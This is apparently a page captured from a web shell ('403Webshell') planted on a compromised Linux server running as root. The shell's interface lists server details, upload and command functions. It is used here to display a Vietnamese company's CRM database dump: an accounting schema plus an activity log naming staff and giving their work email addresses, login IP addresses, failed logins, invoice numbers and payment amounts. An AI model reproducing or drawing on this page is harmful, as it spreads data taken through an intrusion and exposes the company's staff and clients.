403Webshell
Server IP : 14.225.204.176  /  Your IP : 216.73.216.169
Web Server : nginx/1.24.0
System : Linux nodejs-ybgk 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64
User : root ( 0)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/php/wit-crm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/php/wit-crm//zini_witcrm.sql
-- phpMyAdmin SQL Dump
-- version 5.2.1
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Jun 12, 2024 at 04:40 PM
-- Server version: 10.4.32-MariaDB
-- PHP Version: 8.2.12

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `zini_witcrm`
--

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_accounts`
--

CREATE TABLE `tblacc_accounts` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `key_name` varchar(255) DEFAULT NULL,
  `number` varchar(45) DEFAULT NULL,
  `parent_account` int(11) DEFAULT NULL,
  `account_type_id` int(11) NOT NULL,
  `account_detail_type_id` int(11) NOT NULL,
  `balance` decimal(15,2) DEFAULT NULL,
  `balance_as_of` date DEFAULT NULL,
  `description` text DEFAULT NULL,
  `default_account` int(11) NOT NULL DEFAULT 0,
  `active` int(11) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblacc_accounts`
--

INSERT INTO `tblacc_accounts` (`id`, `name`, `key_name`, `number`, `parent_account`, `account_type_id`, `account_detail_type_id`, `balance`, `balance_as_of`, `description`, `default_account`, `active`) VALUES
(1, '', 'acc_accounts_receivable', NULL, NULL, 1, 1, NULL, NULL, NULL, 1, 1),
(2, '', 'acc_accrued_holiday_payable', NULL, NULL, 9, 61, NULL, NULL, NULL, 1, 1),
(3, '', 'acc_accrued_liabilities', NULL, NULL, 8, 44, NULL, NULL, NULL, 1, 1),
(4, '', 'acc_accrued_non_current_liabilities', NULL, NULL, 9, 62, NULL, NULL, NULL, 1, 1),
(5, '', 'acc_accumulated_depreciation_on_property_plant_and_equipment', NULL, NULL, 4, 22, NULL, NULL, NULL, 1, 1),
(6, '', 'acc_allowance_for_bad_debts', NULL, NULL, 2, 2, NULL, NULL, NULL, 1, 1),
(7, '', 'acc_amortisation_expense', NULL, NULL, 14, 106, NULL, NULL, NULL, 1, 1),
(8, '', 'acc_assets_held_for_sale', NULL, NULL, 5, 32, NULL, NULL, NULL, 1, 1),
(9, '', 'acc_available_for_sale_assets_short_term', NULL, NULL, 2, 3, NULL, NULL, NULL, 1, 1),
(10, '', 'acc_bad_debts', NULL, NULL, 14, 108, NULL, NULL, NULL, 1, 1),
(11, '', 'acc_bank_charges', NULL, NULL, 14, 109, NULL, NULL, NULL, 1, 1),
(12, '', 'acc_billable_expense_income', NULL, NULL, 11, 89, NULL, NULL, NULL, 1, 1),
(13, '', 'acc_cash_and_cash_equivalents', NULL, NULL, 3, 15, NULL, NULL, NULL, 1, 1),
(14, '', 'acc_change_in_inventory_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(15, '', 'acc_commissions_and_fees', NULL, NULL, 14, 111, NULL, NULL, NULL, 1, 1),
(16, '', 'acc_cost_of_sales', NULL, NULL, 13, 104, NULL, NULL, NULL, 1, 1),
(17, '', 'acc_deferred_tax_assets', NULL, NULL, 5, 33, NULL, NULL, NULL, 1, 1),
(18, '', 'acc_direct_labour_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(19, '', 'acc_discounts_given_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(20, '', 'acc_dividend_disbursed', NULL, NULL, 10, 69, NULL, NULL, NULL, 1, 1),
(21, '', 'acc_dividend_income', NULL, NULL, 12, 92, NULL, NULL, NULL, 1, 1),
(22, '', 'acc_dividends_payable', NULL, NULL, 8, 48, NULL, NULL, NULL, 1, 1),
(23, '', 'acc_dues_and_subscriptions', NULL, NULL, 14, 113, NULL, NULL, NULL, 1, 1),
(24, '', 'acc_equipment_rental', NULL, NULL, 14, 114, NULL, NULL, NULL, 1, 1),
(25, '', 'acc_equity_in_earnings_of_subsidiaries', NULL, NULL, 10, 70, NULL, NULL, NULL, 1, 1),
(26, '', 'acc_freight_and_delivery_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(27, '', 'acc_goodwill', NULL, NULL, 5, 34, NULL, NULL, NULL, 1, 1),
(28, '', 'acc_income_tax_expense', NULL, NULL, 14, 116, NULL, NULL, NULL, 1, 1),
(29, '', 'acc_income_tax_payable', NULL, NULL, 8, 50, NULL, NULL, NULL, 1, 1),
(30, '', 'acc_insurance_disability', NULL, NULL, 14, 117, NULL, NULL, NULL, 1, 1),
(31, '', 'acc_insurance_general', NULL, NULL, 14, 117, NULL, NULL, NULL, 1, 1),
(32, '', 'acc_insurance_liability', NULL, NULL, 14, 117, NULL, NULL, NULL, 1, 1),
(33, '', 'acc_intangibles', NULL, NULL, 5, 35, NULL, NULL, NULL, 1, 1),
(34, '', 'acc_interest_expense', NULL, NULL, 14, 118, NULL, NULL, NULL, 1, 1),
(35, '', 'acc_interest_income', NULL, NULL, 12, 93, NULL, NULL, NULL, 1, 1),
(36, '', 'acc_inventory', NULL, NULL, 2, 5, NULL, NULL, NULL, 1, 1),
(37, '', 'acc_inventory_asset', NULL, NULL, 2, 5, NULL, NULL, NULL, 1, 1),
(38, '', 'acc_legal_and_professional_fees', NULL, NULL, 14, 119, NULL, NULL, NULL, 1, 1),
(39, '', 'acc_liabilities_related_to_assets_held_for_sale', NULL, NULL, 9, 63, NULL, NULL, NULL, 1, 1),
(40, '', 'acc_long_term_debt', NULL, NULL, 9, 64, NULL, NULL, NULL, 1, 1),
(41, '', 'acc_long_term_investments', NULL, NULL, 5, 38, NULL, NULL, NULL, 1, 1),
(42, '', 'acc_loss_on_discontinued_operations_net_of_tax', NULL, NULL, 14, 120, NULL, NULL, NULL, 1, 1),
(43, '', 'acc_loss_on_disposal_of_assets', NULL, NULL, 12, 94, NULL, NULL, NULL, 1, 1),
(44, '', 'acc_management_compensation', NULL, NULL, 14, 121, NULL, NULL, NULL, 1, 1),
(45, '', 'acc_materials_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(46, '', 'acc_meals_and_entertainment', NULL, NULL, 14, 122, NULL, NULL, NULL, 1, 1),
(47, '', 'acc_office_expenses', NULL, NULL, 14, 123, NULL, NULL, NULL, 1, 1),
(48, '', 'acc_other_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(49, '', 'acc_other_comprehensive_income', NULL, NULL, 10, 73, NULL, NULL, NULL, 1, 1),
(50, '', 'acc_other_general_and_administrative_expenses', NULL, NULL, 14, 123, NULL, NULL, NULL, 1, 1),
(51, '', 'acc_other_operating_income_expenses', NULL, NULL, 12, 97, NULL, NULL, NULL, 1, 1),
(52, '', 'acc_other_selling_expenses', NULL, NULL, 14, 125, NULL, NULL, NULL, 1, 1),
(53, '', 'acc_other_type_of_expenses_advertising_expenses', NULL, NULL, 14, 105, NULL, NULL, NULL, 1, 1),
(54, '', 'acc_overhead_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(55, '', 'acc_payroll_clearing', NULL, NULL, 8, 55, NULL, NULL, NULL, 1, 1),
(56, '', 'acc_payroll_expenses', NULL, NULL, 14, 126, NULL, NULL, NULL, 1, 1),
(57, '', 'acc_payroll_liabilities', NULL, NULL, 8, 56, NULL, NULL, NULL, 1, 1),
(58, '', 'acc_prepaid_expenses', NULL, NULL, 2, 11, NULL, NULL, NULL, 1, 1),
(59, '', 'acc_property_plant_and_equipment', NULL, NULL, 4, 26, NULL, NULL, NULL, 1, 1),
(60, '', 'acc_purchases', NULL, NULL, 14, 130, NULL, NULL, NULL, 1, 1),
(61, '', 'acc_reconciliation_discrepancies', NULL, NULL, 15, 139, NULL, NULL, NULL, 1, 1),
(62, '', 'acc_rent_or_lease_payments', NULL, NULL, 14, 127, NULL, NULL, NULL, 1, 1),
(63, '', 'acc_repair_and_maintenance', NULL, NULL, 14, 128, NULL, NULL, NULL, 1, 1),
(64, '', 'acc_retained_earnings', NULL, NULL, 10, 80, NULL, NULL, NULL, 1, 1),
(65, '', 'acc_revenue_general', NULL, NULL, 11, 86, NULL, NULL, NULL, 1, 1),
(66, '', 'acc_sales', NULL, NULL, 11, 89, NULL, NULL, NULL, 1, 1),
(67, '', 'acc_sales_retail', NULL, NULL, 11, 87, NULL, NULL, NULL, 1, 1),
(68, '', 'acc_sales_wholesale', NULL, NULL, 11, 88, NULL, NULL, NULL, 1, 1),
(69, '', 'acc_sales_of_product_income', NULL, NULL, 11, 89, NULL, NULL, NULL, 1, 1),
(70, '', 'acc_share_capital', NULL, NULL, 10, 81, NULL, NULL, NULL, 1, 1),
(71, '', 'acc_shipping_and_delivery_expense', NULL, NULL, 14, 129, NULL, NULL, NULL, 1, 1),
(72, '', 'acc_short_term_debit', NULL, NULL, 8, 54, NULL, NULL, NULL, 1, 1),
(73, '', 'acc_stationery_and_printing', NULL, NULL, 14, 123, NULL, NULL, NULL, 1, 1),
(74, '', 'acc_subcontractors_cos', NULL, NULL, 13, 100, NULL, NULL, NULL, 1, 1),
(75, '', 'acc_supplies', NULL, NULL, 14, 130, NULL, NULL, NULL, 1, 1),
(76, '', 'acc_travel_expenses_general_and_admin_expenses', NULL, NULL, 14, 132, NULL, NULL, NULL, 1, 1),
(77, '', 'acc_travel_expenses_selling_expense', NULL, NULL, 14, 133, NULL, NULL, NULL, 1, 1),
(78, '', 'acc_unapplied_cash_payment_income', NULL, NULL, 11, 91, NULL, NULL, NULL, 1, 1),
(79, '', 'acc_uncategorised_asset', NULL, NULL, 2, 10, NULL, NULL, NULL, 1, 1),
(80, '', 'acc_uncategorised_expense', NULL, NULL, 14, 124, NULL, NULL, NULL, 1, 1),
(81, '', 'acc_uncategorised_income', NULL, NULL, 11, 89, NULL, NULL, NULL, 1, 1),
(82, '', 'acc_undeposited_funds', NULL, NULL, 2, 13, NULL, NULL, NULL, 1, 1),
(83, '', 'acc_unrealised_loss_on_securities_net_of_tax', NULL, NULL, 12, 99, NULL, NULL, NULL, 1, 1),
(84, '', 'acc_utilities', NULL, NULL, 14, 135, NULL, NULL, NULL, 1, 1),
(85, '', 'acc_wage_expenses', NULL, NULL, 14, 126, NULL, NULL, NULL, 1, 1),
(86, '', 'acc_credit_card', NULL, NULL, 7, 43, NULL, NULL, NULL, 1, 1),
(87, '', 'acc_accounts_payable', NULL, NULL, 6, 42, NULL, NULL, NULL, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_account_history`
--

CREATE TABLE `tblacc_account_history` (
  `id` int(11) NOT NULL,
  `account` int(11) NOT NULL,
  `debit` decimal(15,2) NOT NULL DEFAULT 0.00,
  `credit` decimal(15,2) NOT NULL DEFAULT 0.00,
  `description` text DEFAULT NULL,
  `rel_id` int(11) DEFAULT NULL,
  `rel_type` varchar(45) DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `customer` int(11) DEFAULT NULL,
  `reconcile` int(11) NOT NULL DEFAULT 0,
  `split` int(11) NOT NULL DEFAULT 0,
  `item` int(11) DEFAULT NULL,
  `paid` int(11) NOT NULL DEFAULT 0,
  `date` date DEFAULT NULL,
  `tax` int(11) DEFAULT NULL,
  `payslip_type` varchar(45) DEFAULT NULL,
  `vendor` int(11) DEFAULT NULL,
  `itemable_id` int(11) DEFAULT NULL,
  `cleared` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_account_type_details`
--

CREATE TABLE `tblacc_account_type_details` (
  `id` int(11) NOT NULL,
  `account_type_id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `note` text DEFAULT NULL,
  `statement_of_cash_flows` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblacc_account_type_details`
--

INSERT INTO `tblacc_account_type_details` (`id`, `account_type_id`, `name`, `note`, `statement_of_cash_flows`) VALUES
(200, 1, 'Tiền thu bán hàng khách lẻ', '', 'cash_flows_from_operating_activities'),
(201, 1, 'Tiền thu doanh thu bán dự án', '', 'cash_flows_from_operating_activities');

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_banking_rules`
--

CREATE TABLE `tblacc_banking_rules` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `transaction` varchar(45) DEFAULT NULL,
  `following` varchar(45) DEFAULT NULL,
  `then` varchar(45) DEFAULT NULL,
  `payment_account` int(11) DEFAULT NULL,
  `deposit_to` int(11) DEFAULT NULL,
  `auto_add` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_banking_rule_details`
--

CREATE TABLE `tblacc_banking_rule_details` (
  `id` int(11) NOT NULL,
  `rule_id` int(11) NOT NULL,
  `type` varchar(45) DEFAULT NULL,
  `subtype` varchar(45) DEFAULT NULL,
  `text` varchar(255) DEFAULT NULL,
  `subtype_amount` varchar(45) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_budgets`
--

CREATE TABLE `tblacc_budgets` (
  `id` int(11) NOT NULL,
  `year` int(11) NOT NULL,
  `name` varchar(200) DEFAULT NULL,
  `type` varchar(45) DEFAULT NULL,
  `data_source` varchar(45) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_budget_details`
--

CREATE TABLE `tblacc_budget_details` (
  `id` int(11) NOT NULL,
  `budget_id` int(11) NOT NULL,
  `month` int(11) NOT NULL,
  `year` int(11) NOT NULL,
  `account` int(11) DEFAULT NULL,
  `amount` decimal(15,2) NOT NULL DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_expense_category_mappings`
--

CREATE TABLE `tblacc_expense_category_mappings` (
  `id` int(11) NOT NULL,
  `category_id` int(11) NOT NULL,
  `payment_account` int(11) NOT NULL DEFAULT 0,
  `deposit_to` int(11) NOT NULL DEFAULT 0,
  `preferred_payment_method` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_item_automatics`
--

CREATE TABLE `tblacc_item_automatics` (
  `id` int(11) NOT NULL,
  `item_id` int(11) NOT NULL,
  `inventory_asset_account` int(11) NOT NULL DEFAULT 0,
  `income_account` int(11) NOT NULL DEFAULT 0,
  `expense_account` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_journal_entries`
--

CREATE TABLE `tblacc_journal_entries` (
  `id` int(11) NOT NULL,
  `number` varchar(45) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `journal_date` date DEFAULT NULL,
  `amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `datecreated` datetime DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_matched_transactions`
--

CREATE TABLE `tblacc_matched_transactions` (
  `id` int(11) NOT NULL,
  `account_history_id` int(11) DEFAULT NULL,
  `history_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `rel_id` int(11) DEFAULT NULL,
  `rel_type` varchar(255) DEFAULT NULL,
  `amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `company` int(11) DEFAULT NULL,
  `reconcile` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_payment_mode_mappings`
--

CREATE TABLE `tblacc_payment_mode_mappings` (
  `id` int(11) NOT NULL,
  `payment_mode_id` int(11) NOT NULL,
  `payment_account` int(11) NOT NULL DEFAULT 0,
  `deposit_to` int(11) NOT NULL DEFAULT 0,
  `expense_payment_account` int(11) NOT NULL DEFAULT 0,
  `expense_deposit_to` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_plaid_transaction_logs`
--

CREATE TABLE `tblacc_plaid_transaction_logs` (
  `id` int(11) NOT NULL,
  `bank_id` int(11) DEFAULT NULL,
  `last_updated` date DEFAULT NULL,
  `transaction_count` int(11) DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `addedFrom` int(11) DEFAULT NULL,
  `company` int(11) DEFAULT NULL,
  `status` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_reconciles`
--

CREATE TABLE `tblacc_reconciles` (
  `id` int(11) NOT NULL,
  `account` int(11) NOT NULL,
  `beginning_balance` decimal(15,2) NOT NULL,
  `ending_balance` decimal(15,2) NOT NULL,
  `ending_date` date NOT NULL,
  `expense_date` date DEFAULT NULL,
  `service_charge` decimal(15,2) DEFAULT NULL,
  `expense_account` int(11) DEFAULT NULL,
  `income_date` date DEFAULT NULL,
  `interest_earned` decimal(15,2) DEFAULT NULL,
  `income_account` int(11) DEFAULT NULL,
  `finish` int(11) NOT NULL DEFAULT 0,
  `opening_balance` int(11) NOT NULL DEFAULT 0,
  `debits_for_period` decimal(15,2) DEFAULT NULL,
  `credits_for_period` decimal(15,2) DEFAULT NULL,
  `dateadded` datetime DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_tax_mappings`
--

CREATE TABLE `tblacc_tax_mappings` (
  `id` int(11) NOT NULL,
  `tax_id` int(11) NOT NULL,
  `payment_account` int(11) NOT NULL DEFAULT 0,
  `deposit_to` int(11) NOT NULL DEFAULT 0,
  `expense_payment_account` int(11) NOT NULL DEFAULT 0,
  `expense_deposit_to` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_transaction_bankings`
--

CREATE TABLE `tblacc_transaction_bankings` (
  `id` int(11) NOT NULL,
  `date` date NOT NULL,
  `withdrawals` decimal(15,2) NOT NULL DEFAULT 0.00,
  `deposits` decimal(15,2) NOT NULL DEFAULT 0.00,
  `payee` varchar(255) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `transaction_id` varchar(150) DEFAULT NULL,
  `bank_id` int(11) DEFAULT NULL,
  `status` tinyint(4) NOT NULL DEFAULT 0 COMMENT '1=>posted, 2=>pending',
  `matched` int(11) NOT NULL DEFAULT 0,
  `reconcile` int(11) NOT NULL DEFAULT 0,
  `adjusted` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblacc_transfers`
--

CREATE TABLE `tblacc_transfers` (
  `id` int(11) NOT NULL,
  `transfer_funds_from` int(11) NOT NULL,
  `transfer_funds_to` int(11) NOT NULL,
  `transfer_amount` decimal(15,2) DEFAULT NULL,
  `date` varchar(45) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblactivity_log`
--

CREATE TABLE `tblactivity_log` (
  `id` int(11) NOT NULL,
  `description` mediumtext NOT NULL,
  `date` datetime NOT NULL,
  `staffid` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblactivity_log`
--

INSERT INTO `tblactivity_log` (`id`, `description`, `date`, `staffid`) VALUES
(11553, 'Email Sent To [Email: hogiaphatco@gmail.com, Template: Inventory warning (Sent to staff)]', '2024-02-13 08:00:06', '[CRON]'),
(11554, 'Email Sent To [Email: hogiaphatco@gmail.com, Template: Inventory warning (Sent to staff)]', '2024-02-13 08:15:04', '[CRON]'),
(11555, 'Email Sent To [Email: hogiaphatco@gmail.com, Template: Inventory warning (Sent to staff)]', '2024-02-13 08:30:04', '[CRON]'),
(11556, 'Email Sent To [Email: hogiaphatco@gmail.com, Template: Inventory warning (Sent to staff)]', '2024-02-13 08:45:05', '[CRON]'),
(11557, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-16 10:10:50', 'Admin Hamilton'),
(11558, 'New Client Created [ID: 1442, From Staff: 1]', '2024-02-16 10:11:07', 'Admin Hamilton'),
(11559, 'Contact Created [ID: 1230]', '2024-02-16 10:20:00', 'Admin Hamilton'),
(11560, 'Contact Status Changed [ContactID: 1230 Status(Active/Inactive): 0]', '2024-02-16 10:20:03', 'Admin Hamilton'),
(11561, 'Email Sent To [Email: tien@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-16 10:21:52', 'Admin Hamilton'),
(11562, 'New Task Added [ID:167, Name: Khảo sát nhà máy HOGETSU VN - ngày 20/2 (sáng 9h30)]', '2024-02-16 10:21:52', 'Admin Hamilton'),
(11563, 'Failed Login Attempt [Email: tien@hogiaphat.vn, Is Staff Member: Yes, IP: 115.72.182.133]', '2024-02-16 10:32:26', NULL),
(11564, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-19 08:15:32', 'Loan Nguyễn'),
(11565, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-19 08:21:16', 'Tiến Cao Minh'),
(11566, 'Failed Login Attempt [Email: tamnguyen@hogiaphat.vn, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-19 08:27:29', NULL),
(11567, 'Failed Login Attempt [Email: tamnguyen@hogiaphat.vn, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-19 08:27:41', NULL),
(11568, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-19 08:28:57', 'Tâm Nguyen Thanh'),
(11569, 'Invoice Status Updated [Invoice Number: INV-385-24, From: Nháp To: Đã thanh toán]', '2024-02-19 08:46:21', 'Tâm Nguyen Thanh'),
(11570, 'Payment Recorded [ID:399, Invoice Number: INV-385-24, Total: 250.000 đ]', '2024-02-19 08:46:21', 'Tâm Nguyen Thanh'),
(11571, 'New Client Created [ID: 1443, From Staff: 17]', '2024-02-19 09:47:39', 'Loan Nguyễn'),
(11572, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-19 09:53:24', 'Admin Hamilton'),
(11573, 'Task Updated [ID:165, Name: Anh Quốc Quý dời lịch lắp đặt lại với anh Hiếu trong tháng Giêng này vì nhà khách đang dang dở, mới ốp thạch cao ]', '2024-02-19 14:20:37', 'Loan Nguyễn'),
(11574, 'Email Sent To [Email: tien@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-19 14:20:47', 'Loan Nguyễn'),
(11575, 'Email Sent To [Email: congho@hogiaphat.vn, Template: New Task Assigned (Sent to Staff) [vietnamese]]', '2024-02-19 14:20:50', 'Loan Nguyễn'),
(11576, 'Customer Info Updated [ID: 1442]', '2024-02-19 15:07:32', 'Admin Hamilton'),
(11577, 'Failed Login Attempt [Email: tien@hogiaphat.vn, Is Staff Member: Yes, IP: 171.253.24.36]', '2024-02-19 22:53:06', NULL),
(11578, 'Failed Login Attempt [Email: tien@hogiaphat.vn, Is Staff Member: Yes, IP: 171.253.24.36]', '2024-02-19 22:53:26', NULL),
(11579, 'Failed Login Attempt [Email: tien@hogiaphat.vn, Is Staff Member: Yes, IP: 171.253.24.36]', '2024-02-19 22:53:53', NULL),
(11580, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 171.253.24.36]', '2024-02-19 22:55:17', 'Tiến Cao Minh'),
(11581, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-20 07:25:17', 'Admin Hamilton'),
(11582, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-20 11:58:46', 'Loan Nguyễn'),
(11583, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-20 15:34:21', 'Tâm Nguyen Thanh'),
(11584, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-21 08:18:26', 'Tâm Nguyen Thanh'),
(11585, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-21 08:22:14', 'Loan Nguyễn'),
(11586, 'New Client Created [ID: 1444, From Staff: 17]', '2024-02-21 10:16:52', 'Loan Nguyễn'),
(11587, 'Customer Info Updated [ID: 1444]', '2024-02-21 10:20:31', 'Loan Nguyễn'),
(11588, 'Customer Info Updated [ID: 1444]', '2024-02-21 10:21:01', 'Loan Nguyễn'),
(11589, 'Customer Info Updated [ID: 1444]', '2024-02-21 10:40:36', 'Loan Nguyễn'),
(11590, 'User Successfully Logged In [User Id: 16, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-21 11:41:08', 'Tiến Cao Minh'),
(11591, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 104.28.68.149]', '2024-02-21 13:41:48', 'Admin Hamilton'),
(11592, 'Customer Info Updated [ID: 1444]', '2024-02-21 15:00:01', 'Loan Nguyễn'),
(11593, 'User Successfully Logged In [User Id: 1, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-21 15:19:22', 'Admin Hamilton'),
(11594, 'Invoice Status Updated [Invoice Number: INV-377-24, From: Đã thanh toán một phần To: Đã thanh toán]', '2024-02-21 15:20:08', 'Admin Hamilton'),
(11595, 'Payment Recorded [ID:400, Invoice Number: INV-377-24, Total: 8.000.000 đ]', '2024-02-21 15:20:08', 'Admin Hamilton'),
(11596, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Invoice Payment Recorded (Sent to Staff)]', '2024-02-21 15:20:11', 'Admin Hamilton'),
(11597, 'Payment Recorded [ID:401, Invoice Number: INV-379-24, Total: 147.125 đ]', '2024-02-21 15:22:25', 'Admin Hamilton'),
(11598, 'Payment Deleted [ID:401, Invoice Number: ]', '2024-02-21 15:22:32', 'Admin Hamilton'),
(11599, 'Payment Recorded [ID:402, Invoice Number: INV-379-24, Total: 147.125.000 đ]', '2024-02-21 15:23:22', 'Admin Hamilton'),
(11600, 'Contact Created [ID: 1231]', '2024-02-21 15:28:09', 'Admin Hamilton'),
(11601, 'Invoice Status Updated [Invoice Number: INV-386-24, From: Chưa thanh toán To: Đã thanh toán]', '2024-02-21 23:06:09', 'Admin Hamilton'),
(11602, 'Payment Recorded [ID:403, Invoice Number: INV-386-24, Total: 6.520.000 đ]', '2024-02-21 23:06:09', 'Admin Hamilton'),
(11603, 'Email Sent To [Email: loannguyen@hogiaphat.vn, Template: Invoice Payment Recorded (Sent to Staff)]', '2024-02-21 23:06:15', 'Admin Hamilton'),
(11604, 'Email Sent To [Email: hotro@hogiaphat.vn, Template: Invoice Overdue Notice]', '2024-02-22 01:00:05', '[CRON]'),
(11605, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-22 08:12:50', 'Loan Nguyễn'),
(11606, 'User Successfully Logged In [User Id: 15, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-22 08:21:47', 'Tâm Nguyen Thanh'),
(11607, 'User Successfully Logged In [User Id: 17, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-23 08:09:28', 'Loan Nguyễn'),
(11608, 'Failed Login Attempt [Email: tamnguyen@hogiaphat.vn, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-23 16:14:03', NULL),
(11609, 'Failed Login Attempt [Email: tamnguyen@hogiaphat.vn, Is Staff Member: Yes, IP: 113.161.35.100]', '2024-02-23 16:14:32', NULL),
